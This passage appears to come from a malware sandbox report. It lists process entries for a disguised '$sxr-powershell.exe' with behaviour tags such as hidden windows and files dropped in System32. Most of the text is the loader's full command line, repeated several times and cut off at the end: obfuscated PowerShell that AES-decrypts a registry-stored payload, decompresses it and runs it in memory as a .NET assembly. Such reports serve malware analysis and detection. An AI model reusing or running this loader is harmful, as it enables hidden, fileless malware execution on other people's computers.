[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        13⤵
        Hide Artifacts: Hidden Window
        
        PID:7116
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2848).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        13⤵
        
        PID:5392
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2848).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        13⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:6732
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6732).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = 